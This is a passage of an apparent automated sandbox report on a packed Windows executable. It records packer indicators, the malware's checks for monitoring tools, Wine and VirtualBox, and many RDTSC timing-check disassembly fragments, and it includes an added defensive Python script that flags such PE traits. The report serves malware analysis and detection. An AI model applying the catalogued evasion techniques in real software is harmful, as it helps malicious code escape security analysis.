                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe | Section loaded: rasadhlp.dll
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe | Section loaded: fwpuclnt.dll
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe | Section loaded: schannel.dll
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe | Section loaded: mskeyprotect.dll
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe | Section loaded: ntasn1.dll
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe | Section loaded: ncrypt.dll
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe | Section loaded: ncryptsslp.dll
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe | Section loaded: msasn1.dll
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe | Section loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe | Section loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe | Section loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe | Section loaded: gpapi.dll
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe | Section loaded: dpapi.dll
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe | Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe | Section loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe | Section loaded: wbemcomn.dll
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe | Section loaded: amsi.dll
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe | Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe | Section loaded: profapi.dll
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe | Section loaded: version.dll
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe | Section loaded: ondemandconnroutehelper.dll
                Source: cFLK1CiiNK.exe | Static file information: File size 1865728 > 1048576
                Source: cFLK1CiiNK.exe | Static PE information: Raw size of yrxjmqat is bigger than: 0x100000 < 0x19d600

                Data Obfuscation

                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe | Unpacked PE file: 0.2.cFLK1CiiNK.exe.aa0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;yrxjmqat:EW;kamsbjdu:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;yrxjmqat:EW;kamsbjdu:EW;.taggant:EW;
                Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
                Source: cFLK1CiiNK.exe | Static PE information: real checksum: 0x1d163c should be: 0x1d4a63
                Source: cFLK1CiiNK.exe | Static PE information: section name:
                Source: cFLK1CiiNK.exe | Static PE information: section name: .idata
                Source: cFLK1CiiNK.exe | Static PE information: section name:
                Source: cFLK1CiiNK.exe | Static PE information: section name: yrxjmqat
                Source: cFLK1CiiNK.exe | Static PE information: section name: kamsbjdu
                Source: cFLK1CiiNK.exe | Static PE information: section name: .taggant
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe | Code function: 0_3_016FCBCB push eax; retf 0_3_016FCBE1
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe | Code function: 0_3_01701296 push edi; retf 0_3_017012A9
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe | Code function: 0_3_0172C9D4 push eax; iretd 0_3_0172C9D9
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe | Code function: 0_3_01732737 push edx; ret 0_3_0173273A
                Source: cFLK1CiiNK.exe | Static PE information: section name: entropy: 7.980910308787284
                Source: cFLK1CiiNK.exe | Static PE information: section name: yrxjmqat entropy: 7.954658612611576
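                Every indicator in this block is derivable from the PE headers alone: a section whose name contains non-printable characters, two sections with made-up names (yrxjmqat, kamsbjdu), section entropy within a few hundredths of the 8.0 maximum, a raw section larger than 1 MiB, an entry point that lands in .taggant rather than in a conventional code section, and a stored checksum (0x1d163c) that differs from the computed one (0x1d4a63). The script below is an added example, not Joe Sandbox code and not anything from the sample: it implements those checks as a standalone triage pass over a PE32 image and runs them against a PE constructed inline to echo this layout. The entropy and raw-size thresholds (7.9 and 0x100000), the section contents and the stored checksum, deliberately offset by 0x3427 (the same gap the report shows), are all assumptions made for the example.

```python
"""Static triage for the packer indicators listed under Data Obfuscation: odd
section names, near-maximal entropy, oversized raw sections, an entry point in a
writable+executable section, and a header checksum that does not match the file.
Added example, not Joe Sandbox code; the PE it analyses is constructed inline."""
from collections import Counter
import math
import random
import struct

EXEC, WRITE = 0x20000000, 0x80000000          # IMAGE_SCN_MEM_EXECUTE / _WRITE
STANDARD_NAMES = {b".text", b".rdata", b".data", b".idata", b".edata", b".rsrc",
                  b".reloc", b".bss", b".tls", b".pdata", b".CRT"}

def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 8.0 means every byte value occurs equally often."""
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values()) if n else 0.0

def pe_checksum(image: bytes, checksum_offset: int) -> int:
    """Imagehlp-style checksum: 16-bit word sum with end-around carry, CheckSum field skipped, plus file length."""
    total = 0
    for i in range(0, len(image) - 1, 2):
        if i not in (checksum_offset, checksum_offset + 2):
            total += struct.unpack_from("<H", image, i)[0]
            total = (total & 0xFFFF) + (total >> 16)
    if len(image) % 2:                          # trailing odd byte
        total += image[-1]
    total = (total & 0xFFFF) + (total >> 16)
    total = (total + (total >> 16)) & 0xFFFF
    return (total + len(image)) & 0xFFFFFFFF

def parse_pe(pe: bytes):
    """Return (entry_rva, stored_checksum, checksum_file_offset, sections) for a PE32."""
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    coff, sections = e_lfanew + 4, []
    nsec = struct.unpack_from("<H", pe, coff + 2)[0]
    opt, opt_size = coff + 20, struct.unpack_from("<H", pe, coff + 16)[0]
    entry, stored = struct.unpack_from("<I", pe, opt + 16)[0], struct.unpack_from("<I", pe, opt + 64)[0]
    for i in range(nsec):                       # 40-byte IMAGE_SECTION_HEADER entries
        off = opt + opt_size + 40 * i
        vsize, rva, rawsize, rawptr = struct.unpack_from("<IIII", pe, off + 8)
        sections.append({"name": pe[off:off + 8].rstrip(b"\0"), "rva": rva, "vsize": vsize,
                         "raw": pe[rawptr:rawptr + rawsize], "chars": struct.unpack_from("<I", pe, off + 36)[0]})
    return entry, stored, opt + 64, sections

def triage(pe: bytes, big_raw: int = 0x100000, packed: float = 7.9) -> list:
    """Apply the heuristics; the thresholds are assumptions, not report values."""
    entry, stored, cs_off, sections = parse_pe(pe)
    findings, actual = [], pe_checksum(pe, cs_off)
    if stored != actual:
        findings.append(f"checksum: header 0x{stored:x} should be 0x{actual:x}")
    for s in sections:
        name, raw = s["name"], s["raw"]
        label = name.decode("ascii", "backslashreplace")
        if any(c < 0x20 or c > 0x7E for c in name):
            findings.append(f"section {label}: non-printable characters in name")
        elif name not in STANDARD_NAMES:
            findings.append(f"section {label}: non-standard name")
        if (ent := shannon_entropy(raw)) > packed:
            findings.append(f"section {label}: entropy {ent:.3f} (packed or encrypted)")
        if len(raw) > big_raw:
            findings.append(f"section {label}: raw size 0x{len(raw):x} > 0x{big_raw:x}")
        if s["rva"] <= entry < s["rva"] + max(s["vsize"], len(raw)):
            findings.append(f"entry point 0x{entry:x} in section {label}")
            if s["chars"] & WRITE and s["chars"] & EXEC:
                findings.append(f"section {label}: entry point section is writable and executable")
    return findings

def patch_checksum(pe: bytes, value: int) -> bytes:
    off = parse_pe(pe)[2]
    return pe[:off] + struct.pack("<I", value) + pe[off + 4:]

def build_sample_pe(seed: int = 1) -> bytes:
    """Constructed PE32 echoing the report's layout (test data, not the real sample): control
    bytes in one name, random bytes in 'yrxjmqat', an RWX '.taggant' holding the entry point."""
    rng = random.Random(seed)
    noise = bytes(rng.getrandbits(8) for _ in range(8192))
    specs = [(b"\x01\x02\x03", bytes(range(64)) * 8, EXEC | WRITE | 0x40000020),
             (b".idata", b"\0" * 512, WRITE | 0x40000040),
             (b"yrxjmqat", noise, EXEC | WRITE | 0x40000020),
             (b".taggant", b"\x55\x8b\xec" + b"\x90" * 509, EXEC | WRITE | 0x40000020)]
    file_align, sect_align, hdr_size = 0x200, 0x1000, 0x200
    table, body, rva, raw_ptr, entry = b"", b"", 0x1000, hdr_size, 0
    for name, data, chars in specs:
        data = data.ljust(-(-len(data) // file_align) * file_align, b"\0")
        entry = rva if name == b".taggant" else entry    # entry point at section start
        table += name.ljust(8, b"\0") + struct.pack(
            "<IIIIIIHHI", len(data), rva, len(data), raw_ptr, 0, 0, 0, 0, chars)
        body, raw_ptr = body + data, raw_ptr + len(data)
        rva += -(-len(data) // sect_align) * sect_align
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, len(specs), 0, 0, 0, 0xE0, 0x0102)
    opt = struct.pack("<HBB" + "I" * 9 + "H" * 6 + "I" * 4 + "HH" + "I" * 6,
                      0x10B, 14, 0, 0, 0, 0, entry, 0x1000, 0x2000, 0x400000, sect_align, file_align,
                      6, 0, 0, 0, 6, 0, 0, rva, hdr_size, 0, 2, 0x8140, 0x100000, 0x1000, 0x100000, 0x1000, 0, 16)
    pe = (dos + coff + opt + b"\0" * 128 + table).ljust(hdr_size, b"\0") + body
    # store a checksum that is stale by 0x3427, the same gap the report shows
    return patch_checksum(pe, (pe_checksum(pe, 0x98) + 0x3427) & 0xFFFFFFFF)
```

`triage(build_sample_pe())` returns one finding per indicator. A checksum mismatch on its own proves little, since the field is frequently left wrong by toolchains that never call the checksum routine; it is the combination with entropy above about 7.9 in an RWX section and an entry point outside the first code section that points at a packer stub unpacking into its own image, which is what the "Unpacked PE file" line above records.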

                Boot Survival

                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe | Window searched: window name: FilemonClass
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe | Window searched: window name: PROCMON_WINDOW_CLASS
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe | Window searched: window name: RegmonClass
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe | Window searched: window name: Regmonclass
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe | Window searched: window name: Filemonclass
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe | Process information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe | System information queried: FirmwareTableInformation
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe | File opened: HKEY_CURRENT_USER\Software\Wine
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe | RDTSC instruction interceptor: First address: C7331F second address: C73323 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe | RDTSC instruction interceptor: First address: C73323 second address: C73345 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F612923D914h 0x0000000c push eax 0x0000000d push edx 0x0000000e jno 00007F612923D906h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe | RDTSC instruction interceptor: First address: C73345 second address: C73365 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F61286B7187h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe | RDTSC instruction interceptor: First address: C73365 second address: C7337E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F612923D906h 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F612923D90Bh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe | RDTSC instruction interceptor: First address: C7337E second address: C733A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F61286B7188h 0x00000009 popad 0x0000000a jmp 00007F61286B717Ah 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe | RDTSC instruction interceptor: First address: C61554 second address: C6156F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F612923D90Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b ja 00007F612923D906h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe | RDTSC instruction interceptor: First address: C6156F second address: C61573 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe | RDTSC instruction interceptor: First address: C72A26 second address: C72A2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe | RDTSC instruction interceptor: First address: C72A2A second address: C72A2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe | RDTSC instruction interceptor: First address: C72A2E second address: C72A44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F612923D910h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe | RDTSC instruction interceptor: First address: C72A44 second address: C72A4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe | RDTSC instruction interceptor: First address: C72A4A second address: C72A4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe | RDTSC instruction interceptor: First address: C72BE8 second address: C72BF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe | RDTSC instruction interceptor: First address: C72BF5 second address: C72BFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe | RDTSC instruction interceptor: First address: C72BFB second address: C72C11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F61286B717Dh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe | RDTSC instruction interceptor: First address: C72C11 second address: C72C15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe | RDTSC instruction interceptor: First address: C74CCF second address: C74D30 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F61286B7188h 0x00000008 jmp 00007F61286B7182h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 jnc 00007F61286B717Eh 0x00000016 mov eax, dword ptr [esp+04h] 0x0000001a jg 00007F61286B717Ch 0x00000020 mov eax, dword ptr [eax] 0x00000022 pushad 0x00000023 jmp 00007F61286B7184h 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F61286B717Dh 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe | RDTSC instruction interceptor: First address: C74D30 second address: C74D34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe | RDTSC instruction interceptor: First address: C74D76 second address: C74D7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe | RDTSC instruction interceptor: First address: C74D7E second address: C74DBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F612923D90Ah 0x00000009 popad 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e cld 0x0000000f push 00000000h 0x00000011 mov dword ptr [ebp+122D18F5h], ecx 0x00000017 push 70F21BCDh 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F612923D919h 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe | RDTSC instruction interceptor: First address: C74DBA second address: C74DC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe | RDTSC instruction interceptor: First address: C74DC0 second address: C74DFF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F612923D911h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xor dword ptr [esp], 70F21B4Dh 0x00000012 mov esi, eax 0x00000014 push 00000003h 0x00000016 mov edx, dword ptr [ebp+122D2C47h] 0x0000001c push 00000000h 0x0000001e mov dl, 3Dh 0x00000020 push 00000003h 0x00000022 mov dh, 69h 0x00000024 cld 0x00000025 push 9DBA000Ah 0x0000002a pushad 0x0000002b push eax 0x0000002c push edx 0x0000002d jc 00007F612923D906h 0x00000033 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe | RDTSC instruction interceptor: First address: C74DFF second address: C74E4A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jno 00007F61286B7176h 0x0000000d je 00007F61286B7176h 0x00000013 popad 0x00000014 popad 0x00000015 xor dword ptr [esp], 5DBA000Ah 0x0000001c xor di, 4F7Bh 0x00000021 xor dl, 00000049h 0x00000024 lea ebx, dword ptr [ebp+1244FBF6h] 0x0000002a mov dword ptr [ebp+122D1BE2h], eax 0x00000030 push eax 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007F61286B7188h 0x00000038 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe | RDTSC instruction interceptor: First address: C74E93 second address: C74F18 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F612923D908h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push esi 0x00000010 call 00007F612923D908h 0x00000015 pop esi 0x00000016 mov dword ptr [esp+04h], esi 0x0000001a add dword ptr [esp+04h], 00000015h 0x00000022 inc esi 0x00000023 push esi 0x00000024 ret 0x00000025 pop esi 0x00000026 ret 0x00000027 sub dword ptr [ebp+122D1AE4h], esi 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push ebp 0x00000032 call 00007F612923D908h 0x00000037 pop ebp 0x00000038 mov dword ptr [esp+04h], ebp 0x0000003c add dword ptr [esp+04h], 0000001Dh 0x00000044 inc ebp 0x00000045 push ebp 0x00000046 ret 0x00000047 pop ebp 0x00000048 ret 0x00000049 push eax 0x0000004a jmp 00007F612923D911h 0x0000004f pop edx 0x00000050 mov edi, dword ptr [ebp+122D2C0Bh] 0x00000056 call 00007F612923D909h 0x0000005b jl 00007F612923D914h 0x00000061 push eax 0x00000062 push edx 0x00000063 push eax 0x00000064 push edx 0x00000065 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe | RDTSC instruction interceptor: First address: C74F18 second address: C74F1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe | RDTSC instruction interceptor: First address: C74F1C second address: C74FB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F612923D918h 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push ebx 0x00000011 jns 00007F612923D916h 0x00000017 pop ebx 0x00000018 mov eax, dword ptr [eax] 0x0000001a pushad 0x0000001b jmp 00007F612923D90Fh 0x00000020 pushad 0x00000021 pushad 0x00000022 popad 0x00000023 jmp 00007F612923D90Bh 0x00000028 popad 0x00000029 popad 0x0000002a mov dword ptr [esp+04h], eax 0x0000002e pushad 0x0000002f jmp 00007F612923D90Ch 0x00000034 jo 00007F612923D90Ch 0x0000003a je 00007F612923D906h 0x00000040 popad 0x00000041 pop eax 0x00000042 mov esi, dword ptr [ebp+122D2ABBh] 0x00000048 push 00000003h 0x0000004a push 00000000h 0x0000004c clc 0x0000004d push 00000003h 0x0000004f mov dword ptr [ebp+122D1909h], edi 0x00000055 push 50F132B3h 0x0000005a push eax 0x0000005b push edx 0x0000005c pushad 0x0000005d push eax 0x0000005e push edx 0x0000005f rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe | RDTSC instruction interceptor: First address: C74FB5 second address: C74FBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe | RDTSC instruction interceptor: First address: C75047 second address: C75051 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F612923D906h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe | RDTSC instruction interceptor: First address: C75051 second address: C7506A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F61286B717Ch 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe | RDTSC instruction interceptor: First address: C7506A second address: C75074 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F612923D906h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe | RDTSC instruction interceptor: First address: C75074 second address: C7507A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe | RDTSC instruction interceptor: First address: C7507A second address: C7510F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F612923D916h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c mov ecx, dword ptr [ebp+122D2AAFh] 0x00000012 push 00000000h 0x00000014 mov edx, dword ptr [ebp+122D1BF1h] 0x0000001a push 8214E4BBh 0x0000001f jmp 00007F612923D90Eh 0x00000024 add dword ptr [esp], 7DEB1BC5h 0x0000002b jp 00007F612923D90Ch 0x00000031 mov edi, dword ptr [ebp+122D2A2Bh] 0x00000037 push 00000003h 0x00000039 push 00000000h 0x0000003b push ebp 0x0000003c call 00007F612923D908h 0x00000041 pop ebp 0x00000042 mov dword ptr [esp+04h], ebp 0x00000046 add dword ptr [esp+04h], 00000015h 0x0000004e inc ebp 0x0000004f push ebp 0x00000050 ret 0x00000051 pop ebp 0x00000052 ret 0x00000053 push 00000000h 0x00000055 mov esi, dword ptr [ebp+122D2B83h] 0x0000005b mov edx, dword ptr [ebp+122D2A07h] 0x00000061 push 00000003h 0x00000063 mov si, cx 0x00000066 push 54E3DBC6h 0x0000006b pushad 0x0000006c push ecx 0x0000006d jns 00007F612923D906h 0x00000073 pop ecx 0x00000074 push eax 0x00000075 push edx 0x00000076 pushad 0x00000077 popad 0x00000078 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe | RDTSC instruction interceptor: First address: C86951 second address: C86966 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F61286B717Dh 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe | RDTSC instruction interceptor: First address: C936DE second address: C936EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F612923D908h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe | RDTSC instruction interceptor: First address: C93AFB second address: C93B01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe | RDTSC instruction interceptor: First address: C93B01 second address: C93B20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F612923D917h 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe | RDTSC instruction interceptor: First address: C93B20 second address: C93B62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 jmp 00007F61286B7183h 0x0000000c popad 0x0000000d push esi 0x0000000e pushad 0x0000000f jl 00007F61286B7176h 0x00000015 pushad 0x00000016 popad 0x00000017 jmp 00007F61286B7180h 0x0000001c push edx 0x0000001d pop edx 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 jp 00007F61286B7176h 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe | RDTSC instruction interceptor: First address: C93B62 second address: C93B66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe | RDTSC instruction interceptor: First address: C93B66 second address: C93B6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe | RDTSC instruction interceptor: First address: C93E78 second address: C93E92 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F612923D906h 0x00000009 jmp 00007F612923D90Fh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe | RDTSC instruction interceptor: First address: C93E92 second address: C93EAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 js 00007F61286B7178h 0x0000000f push esi 0x00000010 pop esi 0x00000011 push eax 0x00000012 push edx 0x00000013 push esi 0x00000014 pop esi 0x00000015 jc 00007F61286B7176h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe | RDTSC instruction interceptor: First address: C93EAD second address: C93EB3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe | RDTSC instruction interceptor: First address: C94131 second address: C94135 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe | RDTSC instruction interceptor: First address: C94135 second address: C94139 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe | RDTSC instruction interceptor: First address: C94F24 second address: C94F30 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 js 00007F61286B7176h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe | RDTSC instruction interceptor: First address: C94F30 second address: C94F3C instructions: 0x00000000 rdtsc 0x00000002 jo 00007F612923D90Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
